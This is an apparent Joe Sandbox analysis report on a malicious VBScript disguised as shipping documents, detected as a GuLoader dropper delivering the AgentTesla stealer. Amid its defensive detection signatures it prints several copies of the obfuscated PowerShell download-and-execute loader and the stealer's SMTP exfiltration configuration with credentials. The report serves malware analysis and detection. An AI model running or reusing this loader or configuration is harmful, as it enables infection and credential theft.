Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Shipping Dcuments_CI PKL_HL_.vbs

Overview

General Information

Sample name:Shipping Dcuments_CI PKL_HL_.vbs
Analysis ID:1428354
MD5:8e17d7f6a7a42733f0ff057dcd6e8be8
SHA1:8fe0a41955cf840843da296ecf7b1a57b0a9dfa9
SHA256:223d2f80a60223db2bcdf49cdafd000c7242bb7c3e87ff1a354697719483e68f
Tags:Formbookvbs
Infos:

Detection

AgentTesla, GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
VBScript performs obfuscated calls to suspicious functions
Yara detected AgentTesla
Yara detected GuLoader
Check if machine is in data center or colocation facility
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Found suspicious powershell code related to unpacking or dynamic code loading
Installs a global keyboard hook
Potential malicious VBS script found (suspicious strings)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Very long command line found
Writes or reads registry keys via WMI
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • wscript.exe (PID: 1824 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Shipping Dcuments_CI PKL_HL_.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • WmiPrvSE.exe (PID: 4004 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • powershell.exe (PID: 6816 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Semiannually163 = 1;$Varityped='Substrin';$Varityped+='g';Function Spatiumet($Merotomy){$Ganglioma=$Merotomy.Length-$Semiannually163;For($Undereying136=5; $Undereying136 -lt $Ganglioma; $Undereying136+=(6)){$Stacc+=$Merotomy.$Varityped.Invoke($Undereying136, $Semiannually163);}$Stacc;}function Salsdren($Fortynd){. ($Fusionsaftaler) ($Fortynd);}$Morallovene=Spatiumet 'FindeM SlaboBed,mzGuiltiSu.nolUnforlVarmeaSkru /Afslr5 p yn.U aft0 Kost Al,og(DdsaaW,pitaiboo lnBrssedNusseoSem cwFremssDi eg ChattNPrethT,oren Supra1Abe.s0Guldv.Colou0Haema;Adria Br,dsWr creiFormanRefrn6Uncou4velar; Legi noncix non 6 Nikl4Synli; skri PseurGasm,vP,gts:Bj.rg1 Mo,i2Organ1Armad.Flask0Abs,i)Galo. r tscGSkyldeAktioc DionkNoncooSyske/,atin2Luged0Janse1Bul.p0fj.rn0E cin1Pante0Coope1Surro ,aineFFly eiUvi lr,readeRve,efDiphyoAphroxHarri/Bygn.1Eluls2Ebelt1Tra i.Perca0 Dupe ';$Anathematise=Spatiumet 'Lill,UFalhos SpleeP lorrFiske-OhsknAN.ighg Pawne MasknLechrtOnion ';$Aivr=Spatiumet 'FigurhpreintGer.rtVognppT.llas.onse:Lay u/Bi,le/ B.lldFinerrF.agti Bj,gvindpae.atte. .ilpgCanchoEuropo Educgwr telAfslaered.m.Bak ucK upvoPengem Vlve/AfstvupervecFrit ? k,noeLivewxminerp BelooTiltrrwind tU lia=BallodSankeoOp ftwKrvernDekodlKapreo OxydaHum.ld appl& ScariGeomedAmnio= Hudd1 DommOL.omeS ErroQGal,iaUdbetZKartolChanikRatapr Tink_ Clar7 Kna.hF.uevzspadspRovdy0DeminlAtomaSPh.liF PagiBProgr9 AergdTappejUdb t3FanmagFagblxDagplcN,ninEOutf.oUna.etCentr-Sikke9Figensbrain5Tyven ';$Succesombrust=Spatiumet 'Trykl>Polyh ';$Fusionsaftaler=Spatiumet 'af eniTankeeWattsxAl um ';$Pantebrevshandelen = Spatiumet ' ntee JerncWkdrehA johoL,xia D.ske%SvindaRa,tapDevonpButi,dCi,araOveretPennaaDef,n%Pragt\Flec.EFu,dvlsubapeProvicSortetIndicr TheooEb.lln TroueSup lg Panda .ogltReinsiDriftv Hypee Beci. At eS U.dihUng oaPer,i Patte&union& s.bl Hamm eOsterc KonghUn.pao Urba Lsnin$Pum.c ';Salsdren (Spatiumet 'Suppl$Enh.lgbolivlsemino uni,bBoligaSvulmlindsp: Plo,fTransl Tje,uRinglkGroovtRa eru JungeCatenr HovniGreennUndefgoutre=Himme(Tiltac EpokmXsford Ra.i Prova/datasc Deut Dext.$ mesiPJagteaBoligngelogt SkileBehanbEupherEnra.eL gtevCrustsisba.h DewaaHalopnChrisdSkakte RaillUdadreDec,lnPaatv)Antil ');Salsdren (Spatiumet ' Mist$ Ma,sgTilprl banko dashb.annyaKardslQuant:GeledACemennMaalet Bet.h,iltvr .ndkoAbamppA taco Pa lpPass hPa ahaTr,llgUbereiAgerbsGrns tforsii .airc E,ip=garvn$FratrASeraliArapavFenacrOttea.JournsmorbrpIntarlMandaiCou ttSuper(Skri $St noSAmp,iu NytacContrcRygraePunktsRecomo NavnmKhedabExsicrDametuRustbsUnddrtBesgs)T les ');$Aivr=$Anthropophagistic[0];Salsdren (Spatiumet 'Ov rm$CiphegOpskrlPromeoF rskbScollaAntiplF.ske:b skuFDrvleoafbrer Ulkss .rageFl esnAusredLigniedishblInsissTel.fe UndesDagceoSnapsmTilvekYdelsoShattsb odstAutoenMicreiGalannmindeg SladedopinrFyrin= itriNFa,ceeCellewPhono- SknlOHoussbplotnj Deple HydrcUn.stt Refr KonkuSBucrny.ecoms AffttNo gleSens mSa kt.BelieNOffsheRdseltBe or. Sco.WPoiaae IchtbGi maCKarikl.oostiOpildemedt,nBa.stt Flyd ');Salsdren (Spatiumet ',leek$BerigFPol to,efairPu pessymboeRussinmidd dCeltieDiamalUbesksForgie ites Beseo SkanmForlakBem.loDobbesGadertTouchnsterniShirtnUnoffgSeksae rbejrPalme.Ers aHBelyseManeuaOmniadSupereHewabrTelefsMot,t[ maxi$Kv ntA padrnTen.raBranctToresh,rgameLandlmSekreamyrmit AftriSa,dss T.awe pr.s]N.rin=P,lit$Es.reMNeglpoU derrLivegaja oulEuryglSuitioTiltrvanorge S.rvnDrvtye sh,p ');$Samosa=Spatiumet 'ConfiFSatsao emarrUnpolsPreseesacchn.ichwd Unsue Rgfol vicisMudroeUdenrsunderoFe,mimWe,dik SkruoRejecsBisamtLeeronfeignirustknDonkrgPettie P.anr ,ort.KlammD Ta,ooSal swGrms.nVirkelTurboo Synda A.lgdRikocFAstroi Calal,aneveBroch(Aquo.$.achiAMisgriK.yedvRejserUnpul,Lippi$ F blJ Te eaRetsbkUnsenkP,aine eknonGehe,)Drmme ';$Samosa=$fluktuering[1]+$Samosa;$Jakken=$fluktuering[0];Salsdren (Spatiumet 'Disso$ au.ogAkkrel Estlo .ippbNytteaStupelPmkha:UndefPBotuleRiposrFljtecSove,aSpeci= Tele(M.sicTModule,etersGenh.t Nedb-St,afP Pul,aVitaltBi.lehNitsk Line$BecooJ Orfealasttk.orlfkCost,eslughnSrege)Spalt ');while (!$Perca) {Salsdren (Spatiumet ' Udko$Al.ingStjfolSmickoValutbUnmonaRealelProf.:Rel.tIDrejedSnowseLagenn Se,ttDohiciAbsu.t,avebeGniddtSupers ommemPaatar.aagekIncaveH ldnsAgoni=mult.$LatertBagt.r M.saum.ljreObeys ') ;Salsdren $Samosa;Salsdren (Spatiumet ' CareSS.aldtTinneaAristrI dvatKomme-Oste.SAlbu.lTrumfeGuldse AfkapGoitc Boks4 oms ');Salsdren (Spatiumet 'Inds $GnavegPreexl MonsoKinetbjasesaRevislVario:drommP UndeeTher rBrewic Sm aarepos= O,er(ReinfTMetase MisfsMinvetRote,- IrriPIntelaArve.tSublah Supe Pyrhe$EnemrJ Badma AmtskVliesk Solne ,auhn Ci,c) Car ') ;Salsdren (Spatiumet ' Hrsi$KendegYn lilDyretoli,jebKantoa Han,lSkand:HighlLUnderuPathomResneb.utotuPaakrsH,eft=P.ior$Latiag RegnlUndero Ske,b Ma.daTrykkl ani:Ri gkBHemipeRepr,gSu.errWrencaCan.ivse ebe P,rglChecksStarteSkyhjsStrenkForesaReflep MurreDri ll ProplOrycteBrnefrLejeishande+O.tiu+,luxa%Zilli$TaxafAF rstn BalktAdganhsarder IronoDefacpFlugtoshillpVizorh Kabea LonggLuftii P,risAg.sttReshiiAutorcKrakk.Bra.lcTra ioRkemou nternInvestCodeb ') ;$Aivr=$Anthropophagistic[$Lumbus];}Salsdren (Spatiumet ' ,lan$FortsgInforlSelvio SkinbRanseaRohrnlAnekd: eminNcatasuPirozmNabobmscutceRerair Frnup MaullPaaskaTakstdEnunceA rornDoktosEleme Tast=eskad cadeG Copre AarmtS ffl-DitetCTestdos,linnstafft.aunueKalkbnVarmet Cond Pron,$SymboJP,nctaB,plak undekSquigeYarurnUbaad ');Salsdren (Spatiumet 'Tryne$A vecgLay rlNikoloI filb fkapaKontol Gkke:FerieSUnmigpMetreaAparttDelegtPalaelFlinkeVestidMaci. Mumme=Handy Pythi[ DileSReattyRevissred vtKollieU eldmMi op.PolteCSiennoCh,omnVauntv AngreMindsrMesost.llit]Apter:Somme: oragFAvicur k.sto NdspmOver B.viseaAnda.sH,droekonve6R,gne4 SnotS CasttInflurNonsei ConvnBussegScoli( sple$Omn,pN.uelouJournm FootmVita,eUdklarRespopRegislUdsaeaSuppldAm.anet,enenBekissVesic)Strej ');Salsdren (Spatiumet 'Annso$Be.aigMad.il Suggo,rimeb Fugta Kon,lU.pan:MarinSMiljtp rilsaBendlcMasseiBlankoGyropuphospsDberelMimicy Alp. Sdemn= stje Retti[ PneuSDebriyKnyt.s .aantE.seme kampmOtari.PredeT Stv,eLejekxCentrt Pupi.GramiE Un nnFibricFagfoo.ehondOpspuiFastenLithogIndi,]Basi,:herov: M.thAJobbeSEyewaC AfifIIndisIHand,.AlgotGSkraleAraertTerriSPapritToskirI dbriLazarnvrkstgattro(Bedst$Ho,edS,enzppS,angaElgabtRunddt AktilB.gheeGlaned nder)Telec ');Salsdren (Spatiumet 'Nuanc$SicilgBladelTil,roi stabMuta,aCandllPorr,:MenneESpejlpTilreiCassosSkrespIndfra Ly.psAnal tScrabiD,miccM,lie=Tarif$ RdhaSPandepHalslaC.stoc TragiAfmaroSeconu Av ssRe oglUnderyPedes.Un,onsTilleuMati b.ejltsFri et GosprP,ryni Qu cnRes,rgadopt(Polys2 ilis9Brudf2Ka,in8Rteb.4Mobil6dtr n,,rusi2Mulig8Under3Smel,5Tel,g8Faneb) nmed ');Salsdren $Epispastic;" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 4580 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 5356 cmdline: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Electronegative.Sha && echo $" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • powershell.exe (PID: 1836 cmdline: "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Semiannually163 = 1;$Varityped='Substrin';$Varityped+='g';Function Spatiumet($Merotomy){$Ganglioma=$Merotomy.Length-$Semiannually163;For($Undereying136=5; $Undereying136 -lt $Ganglioma; $Undereying136+=(6)){$Stacc+=$Merotomy.$Varityped.Invoke($Undereying136, $Semiannually163);}$Stacc;}function Salsdren($Fortynd){. ($Fusionsaftaler) ($Fortynd);}$Morallovene=Spatiumet 'FindeM SlaboBed,mzGuiltiSu.nolUnforlVarmeaSkru /Afslr5 p yn.U aft0 Kost Al,og(DdsaaW,pitaiboo lnBrssedNusseoSem cwFremssDi eg ChattNPrethT,oren Supra1Abe.s0Guldv.Colou0Haema;Adria Br,dsWr creiFormanRefrn6Uncou4velar; Legi noncix non 6 Nikl4Synli; skri PseurGasm,vP,gts:Bj.rg1 Mo,i2Organ1Armad.Flask0Abs,i)Galo. r tscGSkyldeAktioc DionkNoncooSyske/,atin2Luged0Janse1Bul.p0fj.rn0E cin1Pante0Coope1Surro ,aineFFly eiUvi lr,readeRve,efDiphyoAphroxHarri/Bygn.1Eluls2Ebelt1Tra i.Perca0 Dupe ';$Anathematise=Spatiumet 'Lill,UFalhos SpleeP lorrFiske-OhsknAN.ighg Pawne MasknLechrtOnion ';$Aivr=Spatiumet 'FigurhpreintGer.rtVognppT.llas.onse:Lay u/Bi,le/ B.lldFinerrF.agti Bj,gvindpae.atte. .ilpgCanchoEuropo Educgwr telAfslaered.m.Bak ucK upvoPengem Vlve/AfstvupervecFrit ? k,noeLivewxminerp BelooTiltrrwind tU lia=BallodSankeoOp ftwKrvernDekodlKapreo OxydaHum.ld appl& ScariGeomedAmnio= Hudd1 DommOL.omeS ErroQGal,iaUdbetZKartolChanikRatapr Tink_ Clar7 Kna.hF.uevzspadspRovdy0DeminlAtomaSPh.liF PagiBProgr9 AergdTappejUdb t3FanmagFagblxDagplcN,ninEOutf.oUna.etCentr-Sikke9Figensbrain5Tyven ';$Succesombrust=Spatiumet 'Trykl>Polyh ';$Fusionsaftaler=Spatiumet 'af eniTankeeWattsxAl um ';$Pantebrevshandelen = Spatiumet ' ntee JerncWkdrehA johoL,xia D.ske%SvindaRa,tapDevonpButi,dCi,araOveretPennaaDef,n%Pragt\Flec.EFu,dvlsubapeProvicSortetIndicr TheooEb.lln TroueSup lg Panda .ogltReinsiDriftv Hypee Beci. At eS U.dihUng oaPer,i Patte&union& s.bl Hamm eOsterc KonghUn.pao Urba Lsnin$Pum.c ';Salsdren (Spatiumet 'Suppl$Enh.lgbolivlsemino uni,bBoligaSvulmlindsp: Plo,fTransl Tje,uRinglkGroovtRa eru JungeCatenr HovniGreennUndefgoutre=Himme(Tiltac EpokmXsford Ra.i Prova/datasc Deut Dext.$ mesiPJagteaBoligngelogt SkileBehanbEupherEnra.eL gtevCrustsisba.h DewaaHalopnChrisdSkakte RaillUdadreDec,lnPaatv)Antil ');Salsdren (Spatiumet ' Mist$ Ma,sgTilprl banko dashb.annyaKardslQuant:GeledACemennMaalet Bet.h,iltvr .ndkoAbamppA taco Pa lpPass hPa ahaTr,llgUbereiAgerbsGrns tforsii .airc E,ip=garvn$FratrASeraliArapavFenacrOttea.JournsmorbrpIntarlMandaiCou ttSuper(Skri $St noSAmp,iu NytacContrcRygraePunktsRecomo NavnmKhedabExsicrDametuRustbsUnddrtBesgs)T les ');$Aivr=$Anthropophagistic[0];Salsdren (Spatiumet 'Ov rm$CiphegOpskrlPromeoF rskbScollaAntiplF.ske:b skuFDrvleoafbrer Ulkss .rageFl esnAusredLigniedishblInsissTel.fe UndesDagceoSnapsmTilvekYdelsoShattsb odstAutoenMicreiGalannmindeg SladedopinrFyrin= itriNFa,ceeCellewPhono- SknlOHoussbplotnj Deple HydrcUn.stt Refr KonkuSBucrny.ecoms AffttNo gleSens mSa kt.BelieNOffsheRdseltBe or. Sco.WPoiaae IchtbGi maCKarikl.oostiOpildemedt,nBa.stt Flyd ');Salsdren (Spatiumet ',leek$BerigFPol to,efairPu pessymboeRussinmidd dCeltieDiamalUbesksForgie ites Beseo SkanmForlakBem.loDobbesGadertTouchnsterniShirtnUnoffgSeksae rbejrPalme.Ers aHBelyseManeuaOmniadSupereHewabrTelefsMot,t[ maxi$Kv ntA padrnTen.raBranctToresh,rgameLandlmSekreamyrmit AftriSa,dss T.awe pr.s]N.rin=P,lit$Es.reMNeglpoU derrLivegaja oulEuryglSuitioTiltrvanorge S.rvnDrvtye sh,p ');$Samosa=Spatiumet 'ConfiFSatsao emarrUnpolsPreseesacchn.ichwd Unsue Rgfol vicisMudroeUdenrsunderoFe,mimWe,dik SkruoRejecsBisamtLeeronfeignirustknDonkrgPettie P.anr ,ort.KlammD Ta,ooSal swGrms.nVirkelTurboo Synda A.lgdRikocFAstroi Calal,aneveBroch(Aquo.$.achiAMisgriK.yedvRejserUnpul,Lippi$ F blJ Te eaRetsbkUnsenkP,aine eknonGehe,)Drmme ';$Samosa=$fluktuering[1]+$Samosa;$Jakken=$fluktuering[0];Salsdren (Spatiumet 'Disso$ au.ogAkkrel Estlo .ippbNytteaStupelPmkha:UndefPBotuleRiposrFljtecSove,aSpeci= Tele(M.sicTModule,etersGenh.t Nedb-St,afP Pul,aVitaltBi.lehNitsk Line$BecooJ Orfealasttk.orlfkCost,eslughnSrege)Spalt ');while (!$Perca) {Salsdren (Spatiumet ' Udko$Al.ingStjfolSmickoValutbUnmonaRealelProf.:Rel.tIDrejedSnowseLagenn Se,ttDohiciAbsu.t,avebeGniddtSupers ommemPaatar.aagekIncaveH ldnsAgoni=mult.$LatertBagt.r M.saum.ljreObeys ') ;Salsdren $Samosa;Salsdren (Spatiumet ' CareSS.aldtTinneaAristrI dvatKomme-Oste.SAlbu.lTrumfeGuldse AfkapGoitc Boks4 oms ');Salsdren (Spatiumet 'Inds $GnavegPreexl MonsoKinetbjasesaRevislVario:drommP UndeeTher rBrewic Sm aarepos= O,er(ReinfTMetase MisfsMinvetRote,- IrriPIntelaArve.tSublah Supe Pyrhe$EnemrJ Badma AmtskVliesk Solne ,auhn Ci,c) Car ') ;Salsdren (Spatiumet ' Hrsi$KendegYn lilDyretoli,jebKantoa Han,lSkand:HighlLUnderuPathomResneb.utotuPaakrsH,eft=P.ior$Latiag RegnlUndero Ske,b Ma.daTrykkl ani:Ri gkBHemipeRepr,gSu.errWrencaCan.ivse ebe P,rglChecksStarteSkyhjsStrenkForesaReflep MurreDri ll ProplOrycteBrnefrLejeishande+O.tiu+,luxa%Zilli$TaxafAF rstn BalktAdganhsarder IronoDefacpFlugtoshillpVizorh Kabea LonggLuftii P,risAg.sttReshiiAutorcKrakk.Bra.lcTra ioRkemou nternInvestCodeb ') ;$Aivr=$Anthropophagistic[$Lumbus];}Salsdren (Spatiumet ' ,lan$FortsgInforlSelvio SkinbRanseaRohrnlAnekd: eminNcatasuPirozmNabobmscutceRerair Frnup MaullPaaskaTakstdEnunceA rornDoktosEleme Tast=eskad cadeG Copre AarmtS ffl-DitetCTestdos,linnstafft.aunueKalkbnVarmet Cond Pron,$SymboJP,nctaB,plak undekSquigeYarurnUbaad ');Salsdren (Spatiumet 'Tryne$A vecgLay rlNikoloI filb fkapaKontol Gkke:FerieSUnmigpMetreaAparttDelegtPalaelFlinkeVestidMaci. Mumme=Handy Pythi[ DileSReattyRevissred vtKollieU eldmMi op.PolteCSiennoCh,omnVauntv AngreMindsrMesost.llit]Apter:Somme: oragFAvicur k.sto NdspmOver B.viseaAnda.sH,droekonve6R,gne4 SnotS CasttInflurNonsei ConvnBussegScoli( sple$Omn,pN.uelouJournm FootmVita,eUdklarRespopRegislUdsaeaSuppldAm.anet,enenBekissVesic)Strej ');Salsdren (Spatiumet 'Annso$Be.aigMad.il Suggo,rimeb Fugta Kon,lU.pan:MarinSMiljtp rilsaBendlcMasseiBlankoGyropuphospsDberelMimicy Alp. Sdemn= stje Retti[ PneuSDebriyKnyt.s .aantE.seme kampmOtari.PredeT Stv,eLejekxCentrt Pupi.GramiE Un nnFibricFagfoo.ehondOpspuiFastenLithogIndi,]Basi,:herov: M.thAJobbeSEyewaC AfifIIndisIHand,.AlgotGSkraleAraertTerriSPapritToskirI dbriLazarnvrkstgattro(Bedst$Ho,edS,enzppS,angaElgabtRunddt AktilB.gheeGlaned nder)Telec ');Salsdren (Spatiumet 'Nuanc$SicilgBladelTil,roi stabMuta,aCandllPorr,:MenneESpejlpTilreiCassosSkrespIndfra Ly.psAnal tScrabiD,miccM,lie=Tarif$ RdhaSPandepHalslaC.stoc TragiAfmaroSeconu Av ssRe oglUnderyPedes.Un,onsTilleuMati b.ejltsFri et GosprP,ryni Qu cnRes,rgadopt(Polys2 ilis9Brudf2Ka,in8Rteb.4Mobil6dtr n,,rusi2Mulig8Under3Smel,5Tel,g8Faneb) nmed ');Salsdren $Epispastic;" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • cmd.exe (PID: 1012 cmdline: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Electronegative.Sha && echo $" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • wab.exe (PID: 6928 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "Port": "587", "Host": "mail.myhydropowered.com", "Username": "antenna@myhydropowered.com", "Password": "jnKkQ2DFtjsDqGZ"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000007.00000002.2066487605.0000000008580000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
    00000007.00000002.2054965837.0000000005C45000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
      0000000B.00000002.2782121824.0000000022FEB000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
        0000000B.00000002.2765371278.0000000005800000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
          0000000B.00000002.2782121824.0000000022FC5000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            Click to see the 5 entries

            Other

            SourceRuleDescriptionAuthorStrings
            amsi32_1836.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
            • 0xe1a7:$b2: ::FromBase64String(
            • 0xd260:$s1: -join
            • 0x6a0c:$s4: +=
            • 0x6ace:$s4: +=
            • 0xacf5:$s4: +=
            • 0xce12:$s4: +=
            • 0xd0fc:$s4: +=
            • 0xd242:$s4: +=
            • 0x16fa5:$s4: +=
            • 0x17025:$s4: +=
            • 0x170eb:$s4: +=
            • 0x1716b:$s4: +=
            • 0x17341:$s4: +=
            • 0x173c5:$s4: +=
            • 0xda50:$e4: Get-WmiObject
            • 0xdc3f:$e4: Get-Process
            • 0xdc97:$e4: Start-Process
            • 0x15ab2:$e4: Get-Process

            Sigma Signatures

            System Summary

            barindex
            Sigma detected: WScript or CScript Dropper
            Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Shipping Dcuments_CI PKL_HL_.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Shipping Dcuments_CI PKL_HL_.vbs", CommandLine|base64offset|contains: z{l", Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4084, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Shipping Dcuments_CI PKL_HL_.vbs", ProcessId: 1824, ProcessName: wscript.exe
            Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
            Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Shipping Dcuments_CI PKL_HL_.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Shipping Dcuments_CI PKL_HL_.vbs", CommandLine|base64offset|contains: z{l", Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4084, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Shipping Dcuments_CI PKL_HL_.vbs", ProcessId: 1824, ProcessName: wscript.exe
            Sigma detected: Non Interactive PowerShell Process Spawned
            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Semiannually163 = 1;$Varityped='Substrin';$Varityped+='g';Function Spatiumet($Merotomy){$Ganglioma=$Merotomy.Length-$Semiannually163;For($Undereying136=5; $Undereying136 -lt $Ganglioma; $Undereying136+=(6)){$Stacc+=$Merotomy.$Varityped.Invoke($Undereying136, $Semiannually163);}$Stacc;}function Salsdren($Fortynd){. ($Fusionsaftaler) ($Fortynd);}$Morallovene=Spatiumet 'FindeM SlaboBed,mzGuiltiSu.nolUnforlVarmeaSkru /Afslr5 p yn.U aft0 Kost Al,og(DdsaaW,pitaiboo lnBrssedNusseoSem cwFremssDi eg ChattNPrethT,oren Supra1Abe.s0Guldv.Colou0Haema;Adria Br,dsWr creiFormanRefrn6Uncou4velar; Legi noncix non 6 Nikl4Synli; skri PseurGasm,vP,gts:Bj.rg1 Mo,i2Organ1Armad.Flask0Abs,i)Galo. r tscGSkyldeAktioc DionkNoncooSyske/,atin2Luged0Janse1Bul.p0fj.rn0E cin1Pante0Coope1Surro ,aineFFly eiUvi lr,readeRve,efDiphyoAphroxHarri/Bygn.1Eluls2Ebelt1Tra i.Perca0 Dupe ';$Anathematise=Spatiumet 'Lill,UFalhos SpleeP lorrFiske-OhsknAN.ighg Pawne MasknLechrtOnion ';$Aivr=Spatiumet 'FigurhpreintGer.rtVognppT.llas.onse:Lay u/Bi,le/ B.lldFinerrF.agti Bj,gvindpae.atte. .ilpgCanchoEuropo Educgwr telAfslaered.m.Bak ucK upvoPengem Vlve/AfstvupervecFrit ? k,noeLivewxminerp BelooTiltrrwind tU lia=BallodSankeoOp ftwKrvernDekodlKapreo OxydaHum.ld appl& ScariGeomedAmnio= Hudd1 DommOL.omeS ErroQGal,iaUdbetZKartolChanikRatapr Tink_ Clar7 Kna.hF.uevzspadspRovdy0DeminlAtomaSPh.liF PagiBProgr9 AergdTappejUdb t3FanmagFagblxDagplcN,ninEOutf.oUna.etCentr-Sikke9Figensbrain5Tyven ';$Succesombrust=Spatiumet 'Trykl>Polyh ';$Fusionsaftaler=Spatiumet 'af eniTankeeWattsxAl um ';$Pantebrevshandelen = Spatiumet ' ntee JerncWkdrehA johoL,xia D.ske%SvindaRa,tapDevonpButi,dCi,araOveretPennaaDef,n%Pragt\Flec.EFu,dvlsubapeProvicSortetIndicr TheooEb.lln TroueSup lg Panda .ogltReinsiDriftv Hypee Beci. At eS U.dihUng oaPer,i Patte&union& s.bl Hamm eOsterc KonghUn.pao Urba Lsnin$Pum.c ';Salsdren (Spatiumet 'Suppl$Enh.lgbolivlsemino uni,bBoligaSvulmlindsp: Plo,fTransl Tje,uRinglkGroovtRa eru JungeCatenr HovniGreennUndefgoutre=Himme(Tiltac EpokmXsford Ra.i Prova/datasc Deut Dext.$ mesiPJagteaBoligngelogt SkileBehanbEupherEnra.eL gtevCrustsisba.h DewaaHalopnChrisdSkakte RaillUdadreDec,lnPaatv)Antil ');Salsdren (Spatiumet ' Mist$ Ma,sgTilprl banko dashb.annyaKardslQuant:GeledACemennMaalet Bet.h,iltvr .ndkoAbamppA taco Pa lpPass hPa ahaTr,llgUbereiAgerbsGrns tforsii .airc E,ip=garvn$FratrASeraliArapavFenacrOttea.JournsmorbrpIntarlMandaiCou ttSuper(Skri $St noSAmp,iu NytacContrcRygraePunktsRecomo NavnmKhedabExsicrDametuRustbsUnddrtBesgs)T les ');$Aivr=$Anthropophagistic[0];Salsdren (Spatiumet 'Ov rm$CiphegOpskrlPromeoF rskbScollaAntiplF.ske:b skuFDrvleoafbrer Ulkss .rageFl esnAusredLigniedishblInsissTel.fe UndesDagceoSnapsmTilvekYdelsoShattsb odstAutoenMicreiGalannmindeg SladedopinrFyrin= itriNFa,ceeCellewPhono- 